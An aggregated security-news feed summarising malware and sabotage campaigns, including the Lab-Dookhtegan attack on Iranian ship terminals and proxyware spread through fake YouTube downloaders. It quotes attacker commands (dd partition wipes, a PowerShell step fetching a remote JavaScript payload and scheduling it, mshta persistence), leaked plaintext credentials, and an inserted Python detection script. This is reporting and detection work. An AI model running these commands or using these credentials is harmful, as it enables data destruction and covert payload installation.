• Scammers are using Google Ads to pose as Tesla in an elaborate cybercrime campaign that aims to obtain illicit preorders for the company’s unreleased Optimus humanoid robot and other items. These deceptive sponsored listings appear prominently in search results for terms like “Optimus Tesla preorder,” directing users to counterfeit websites that mimic Tesla’s official domain. […]

    The post Beware! Google Ads Promote Fake Tesla Websites Soliciting Fraudulent Deposits appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

  • A China-nexus threat actor known as UNC6384 has been attributed to a set of attacks targeting diplomats in Southeast Asia and other entities across the globe to advance Beijing’s strategic interests. “This multi-stage attack chain leverages advanced social engineering including valid code signing certificates, an adversary-in-the-middle (AitM) attack, and indirect execution techniques to evade

  • Docker has released fixes to address a critical security flaw affecting the Docker Desktop app for Windows and macOS that could potentially allow an attacker to break out of the confines of a container. The vulnerability, tracked as CVE-2025-9074, carries a CVSS score of 9.3 out of 10.0. It has been addressed in version 4.44.3. “A malicious container running on Docker Desktop could access the

  • The National Iranian Tanker Company (NITC) and Islamic Republic of Iran Shipping Lines (IRISL), two sanctioned companies, are the operators of 64 boats, 39 tankers, and 25 cargo ships that were compromised in a targeted attack on Iran’s maritime infrastructure by the hacking collective Lab-Dookhtegan. Rather than attempting direct breaches of individual ships, which are […]

    The post Hackers Disrupt Iranian Ships via Maritime Communication Terminals Exploiting MySQL Database appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

  • A sophisticated campaign of cyber sabotage unfolded against Iran’s maritime communications infrastructure in late August 2025, cutting off dozens of vessels from vital satellite links and navigation aids.

    Rather than targeting each ship individually—a logistical nightmare across international waters—the attackers infiltrated Fanava Group, the IT provider responsible for satellite communications to Iran’s sanctioned tanker fleets.

    By compromising the company’s outdated iDirect Falcon terminals, they gained root access to Linux systems running kernel 2.6.35 and mapped the entire constellation of vessels through a centralized MySQL database.

    The initial breach vector appears to have exploited unpatched vulnerabilities in legacy Falcon management consoles, allowing the threat actors to execute privileged commands and exfiltrate network mappings.

    Once inside, they harvested modem serial numbers, network IDs, and IP phone system configurations in plain text, including credentials such as “1402@Argo” and “1406@Diamond.”

    These details were then weaponized to orchestrate a synchronized blackout: email and FBB SIM communications failed, automated weather updates ceased, and port coordination signals vanished almost instantaneously.

    Nariman Gharib researchers identified that the campaign, dubbed Lab-Dookhtegan, was not a one-off disruption.

    Email logs dating back to May revealed persistent access and periodic “Node Down” tests, confirming that the attackers maintained control over the networks for months before launching a destructive finale.

    On August 18, they executed a “scorched earth” sequence, overwriting multiple storage partitions on satellite modems with zeroed data, rendering remote recovery impossible.

    FANAVA (Source – Nariman Gharib)

    By crippling Iran’s sanctioned fleets—NITC and IRISL—at a time when covert oil transfers to China intensify, the attackers dealt a blow to the country’s sanctions-evasion capabilities.

    Without communication links, tankers risk drifting off-course or becoming easy targets for boarding and seizure. The operation’s precision underscores a deep reconnaissance phase, allowing the threat actors to deliver maximally disruptive payloads at the worst strategic moment.

    Infection Mechanism

    The malware’s infection mechanism relied on a multi-stage approach: initial access through unprotected management ports, lateral movement via SSH keys harvested from MySQL dumps, and deployment of destructive scripts.

After gaining root on a compromised Falcon console, the attackers executed commands akin to:

    dd if=/dev/zero of=/dev/mmcblk0p1 bs=1M
    dd if=/dev/zero of=/dev/mmcblk0p2 bs=1M

    These commands systematically wiped primary storage partitions and recovery slices, ensuring the terminal’s firmware and configurations were irrecoverable without physical intervention.

    IP addresses and passwords in plain text (Source – Nariman Gharib)

Simultaneously, SQL queries extracted the fleet blueprint:

    SELECT serial_number, vessel_name, network_id
    FROM modems;

    Armed with this data, the attackers automated credential injection and shutdown sequences across 64 vessels with a single orchestration script.

    PoCs (Source – Nariman Gharib)

    By embedding malicious cron entries, they achieved both persistence and timed execution, triggering the blackout at a moment calculated to maximize operational chaos.

    This infection chain highlights the importance of isolating management interfaces and enforcing strict patch regimes on critical satellite communication systems.

    The post Hackers Sabotage Iranian Ships Using Maritime Communications Terminals in Its MySQL Database appeared first on Cyber Security News.

  • Cybersecurity researchers at AhnLab Security Intelligence Center (ASEC) have uncovered a persistent campaign where attackers distribute proxyware malware through fake YouTube video download pages. This operation, which mimics legitimate video downloading services, tricks users into installing malicious executables disguised as benign tools like WinMemoryCleaner. The attackers leverage GitHub for malware hosting, a tactic consistent with […]

    The post Proxyware Malware Poses as YouTube Video Download Site, Delivering Malicious JavaScript appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

  • Cybersecurity researchers have observed a surge in deceptive sites masquerading as YouTube video download services to deliver Proxyware malware in recent weeks.

    Victims seeking to grab videos in MP4 format are redirected through ad pages that sporadically present a download link for a seemingly legitimate utility called “WinMemoryCleaner.”

    Behind this innocuous facade, however, lies a multi-stage installer that ultimately deploys Proxyware and covertly enslaves the system’s network bandwidth.

    The initial download executable, Setup.exe, unpacks WinMemoryCleaner.exe into the Program Files directory before triggering an update script via WinMemoryCleanerUpdate.bat.

    Once executed, WinMemoryCleaner.exe performs environment checks to evade virtual machines or sandbox analysis, then invokes a PowerShell payload that installs Node.js and fetches a malicious JavaScript component from a remote server.

    Attack Flow (Source – ASEC)

    ASEC analysts identified this technique as a refined evolution of previous Proxyware campaigns, noting the attacker’s reliance on GitHub for hosting intermediary tools.

    Subsequent stages involve the registration of two scheduled tasks—“Schedule Update” and “WindowsDeviceUpdates”—that ensure the JavaScript runs periodically under Node.js.

    This script communicates basic system information to a command-and-control server and awaits directives, which can include fetching additional scripts or initiating the final Proxyware installation.

    Information Sent to C&C Server (Source – ASEC)

    ASEC researchers noted that the actor has pivoted from distributing only DigitalPulse and HoneyGain Proxyware to integrating Infatica’s agent, enhancing bandwidth theft capabilities.

    The impact of this campaign is twofold: affected systems experience degraded network performance, and the attacker monetizes the stolen bandwidth through affiliate programs.

    YouTube Downloader Page and Malware Download Link (Source – ASEC)

Proxyware programs typically share idle network throughput and promise remuneration to end users, but compromised victims unwittingly supply bandwidth without compensation.

    In regions with high adoption of streaming services, such as South Korea, the campaign’s reach has grown significantly, prompting warnings from major AV vendors.

    Infection Mechanism

    A deeper examination of the infection mechanism reveals the pivotal role of the PowerShell script delivered by WinMemoryCleaner.exe.

The script begins with a stealthy installation of Node.js:

    Invoke-WebRequest -Uri "https://nodejs.org/dist/v14.17.0/node-v14.17.0-x64.msi" -OutFile "$env:TEMP\node.msi"
    Start-Process msiexec.exe -ArgumentList '/i', "$env:TEMP\node.msi", '/qn' -Wait

Once Node.js is in place, the script downloads pas.js from a CloudFront URL and registers it:

    $jsUrl = "https://d14vmbql41e8a5.cloudfront.net/pas.js"
    Invoke-WebRequest -Uri $jsUrl -OutFile "$env:ProgramFiles\WinMemoryCleaner\p.js"
    schtasks /Create /F /SC MINUTE /MO 30 /TN "Schedule Update" /TR "node $env:ProgramFiles\WinMemoryCleaner\p.js"

    Continuous execution of the JavaScript component under Node.js enables dynamic updates and final payload deployment, making eradication challenging without specialized tools.

    The post Proxyware Malware Mimic as YouTube Video Download Site Delivers Malicious Javascripts appeared first on Cyber Security News.

  • Cybersecurity researchers have flagged a new phishing campaign that’s using fake voicemails and purchase orders to deliver a malware loader called UpCrypter. The campaign leverages “carefully crafted emails to deliver malicious URLs linked to convincing phishing pages,” Fortinet FortiGuard Labs researcher Cara Lin said. “These pages are designed to entice recipients into downloading JavaScript

  • In recent weeks, cybersecurity investigators have uncovered a novel campaign in which hackers leverage seemingly benign potentially unwanted program (PUP) advertisements to deliver stealthy Windows malware.

    The lure typically begins with ads promoting free PDF tools or desktop assistants that redirect victims to spoofed download sites.

    Once users click through, a scheduled task silently retrieves a JavaScript loader from a temporary directory and executes it via Microsoft HTML Application Host (MSHTA).

    This sequence installs a decoy application—ManualFinder—designed to appear legitimate while establishing footholds in target environments.

    The decoy’s innocuous functionality masks a far more insidious objective. When run, ManualFinder requests no user interaction beyond the initial installation, quietly opening ports and relaying commands to remote infrastructure.

    Expel analysts identified that the JavaScript loader reaches out to domains such as mka3e8.com and 5b7crp.com, previously associated with residential proxy services, indicating a broader scheme to conscript infected machines into proxy networks.

    While initial infections have been linked to OneStart Browser installs, researchers observed that AppSuite-PDF and PDFEditor installers follow identical patterns, each signed by dubious code-signing certificates from entities like “GLINT SOFTWARE SDN. BHD.”

    Expel researchers identified that the malware campaign’s impact extends beyond proxying. In certain environments, PDFEditor installations prompt users to consent to residential proxy use in exchange for free editing capabilities, effectively monetizing unsuspecting endpoints.

    Other instances show the decoy apps modifying browser profiles and harvesting stored cookies, suggesting secondary data-exfiltration objectives.

    By the time defenders detect unusual MSHTA invocations or node.exe processes running hidden JavaScript, the adversary has often already established persistence and network outposts.

    In total, investigators have cataloged over 70 unique JavaScript variants, all reaching out to the same malicious domains.

Code snippets embedded in scheduled-task definitions reveal how persistence is maintained:

    schtasks /Create /TN "ManualFinderTask" /TR "mshta.exe \"C:\Users\<user>\AppData\Local\Temp\<guid>.js\"" /SC DAILY /ST 03:00
    Scheduled task creation invoking MSHTA (Source – Expel)

The loader then executes:

    cmd[.]exe /d /s /c "msiexec /qn /i \"C:\Users\<user>\AppData\Local\TEMP\ManualFinder-v2.0.196.msi\""
    ManualFinder (Source – Expel)

    Infection Mechanism

    Delving deeper into the infection mechanism, the campaign exploits Windows scripting hosts and MSI installer features to achieve near-undetectable deployment.

    The sequence begins when the scheduled task runs under the context of the SYSTEM-level svchost service, launching node.exe with a randomized JavaScript filename (e.g., 9b9797f4-274c-fbb9-81ae-3b4f33b7010a.js).

    This script downloads the ManualFinder MSI from the attacker’s server and installs it with quiet flags (/qn /n) to suppress any user interface.

    Because msiexec runs under cmd[.]exe with disabled autorun (/d) and custom quote handling (/s), traditional EDR alerts tied to user applications are often bypassed.

    PDF Editor (Source – Expel)

    Once installed, the malware registers its own service and scheduled tasks to re-execute the JavaScript loader at regular intervals, ensuring re-infection even after removal attempts.

The scheduled-task definition shown earlier illustrates the MSHTA invocation that enables this stealthy execution.
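As an added example that serves both the proxyware write-up above and this PUP campaign (it is not code from either post, nor from ASEC or Expel), the following Python flags process-creation telemetry matching the MSHTA, node.exe, msiexec and schtasks patterns the two articles describe. The Sysmon-style field names (Image, ParentImage, CommandLine), the user name and the sample events are assumptions constructed for the example.

```python
import re
# Added example (not from the original posts): flag process-creation events (Sysmon Event ID 1
# style Image/ParentImage/CommandLine fields) matching the MSHTA, node.exe, msiexec and schtasks patterns above.
TEMP = r"\\AppData\\Local\\Temp\\"  # per-user temp directory both loaders stage files in

# (rule name, regex the Image must match, regexes the CommandLine must ALL match)
RULES = [
    ("mshta_runs_js_from_temp", r"\\mshta\.exe$",
     [TEMP + r"[^\s\"']+\.js\b"]),
    ("node_runs_js_from_programfiles_or_temp", r"\\node\.exe$",
     [r"(?:\\Program Files\\|" + TEMP + r")[^\"']+\.js\b"]),
    ("quiet_msi_install_from_temp", r"\\msiexec\.exe$",
     [r"(?<!\S)/qn\b", TEMP + r"[^\s\"']+\.msi\b"]),
    ("schtasks_persists_script_host", r"\\schtasks\.exe$",
     [r"(?<!\S)/create\b", r"/tr\s+\"?[^\"]*\b(?:mshta|node)(?:\.exe)?\b"]),
]

def classify(event):
    """Return the names of every rule this event matches (empty list = not flagged)."""
    image, cmd = event.get("Image", ""), event.get("CommandLine", "")
    return [name for name, img_re, needed in RULES
            if re.search(img_re, image, re.I)
            and all(re.search(p, cmd, re.I) for p in needed)]

def triage(events):
    """Map EventId -> matched rules, noting an svchost.exe parent (the Task Scheduler host)."""
    findings = {}
    for ev in events:
        hits = classify(ev)
        if hits:
            if ev.get("ParentImage", "").lower().endswith("\\svchost.exe"):
                hits.append("launched_by_scheduled_task_host")
            findings[ev["EventId"]] = hits
    return findings

# Constructed sample telemetry: user name, event ids and parent images are made up.
JS = r"C:\Users\alice\AppData\Local\Temp\9b9797f4-274c-fbb9-81ae-3b4f33b7010a.js"
SAMPLE_EVENTS = [
    {"EventId": 1, "Image": r"C:\Windows\System32\schtasks.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": 'schtasks /Create /TN "ManualFinderTask" /TR "mshta.exe \\"' + JS + '\\"" /SC DAILY /ST 03:00'},
    {"EventId": 2, "Image": r"C:\Windows\System32\mshta.exe", "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": 'mshta.exe "' + JS + '"'},
    {"EventId": 3, "Image": r"C:\Windows\System32\msiexec.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'msiexec /qn /i "C:\Users\alice\AppData\Local\TEMP\ManualFinder-v2.0.196.msi"'},
    {"EventId": 4, "Image": r"C:\Program Files\nodejs\node.exe", "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r'"C:\Program Files\nodejs\node.exe" "C:\Program Files\WinMemoryCleaner\p.js"'},
    {"EventId": 5, "Image": r"C:\Windows\System32\msiexec.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'msiexec /i "C:\Users\alice\Downloads\tool.msi"'},  # interactive install, not flagged
]
```

Calling triage(SAMPLE_EVENTS) flags events 1 to 4 and leaves the interactive msiexec install (event 5) alone; the regexes are deliberately narrow, so tune the path and flag patterns to your own telemetry before relying on them.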

    The post Hackers Using PUP Advertisements to Silently Drop Windows Malware appeared first on Cyber Security News.

  • Cybersecurity researchers have uncovered a persistent campaign deploying the AndroidOS SpyNote malware, a sophisticated Remote Access Trojan (RAT) designed for surveillance, data exfiltration, and remote device control. This operation mimics legitimate Google Play Store pages for popular Android apps, tricking users into downloading malicious APK files. The campaign, linked to the same threat actor previously […]

    The post Fake Google Play Store Websites Deliver Potent RAT to Steal Sensitive Data appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
